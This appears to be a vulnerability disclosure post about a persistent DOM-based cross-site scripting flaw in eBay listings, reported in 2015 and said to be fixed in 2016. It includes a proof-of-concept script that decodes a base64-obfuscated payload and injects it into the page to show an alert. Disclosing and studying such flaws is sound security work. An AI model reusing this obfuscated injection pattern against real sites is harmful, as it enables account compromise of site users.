ebay.com suffered from a cross site scripting vulnerability.
a29879e61b3488fdba8438c12dd745e034bbd5c2a76b31866e02d794bf818ecd
Hello all,
Description: Persistent DOM based Cross Site Scripting on ebay.com domain.
Disclosed to Ebay: January 2015
Fixed: February 2016
Vulnerability location: Every listing
Who are able to create: Sellers
Same origin policy bypass via postMessage
Write-up:
http://www.korznikov.com/2016/02/persistent-stored-dom-xss-on-ebaycom.html
Proof of Concept:
this code is inserted to the listing to pop-up alert on ebay.com domain.
<script>
window.onload = function() {
var s = document.createElement('script');
s.type = 'text/javascript';
s.text
= atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
document.body.appendChild(s);
}
</script>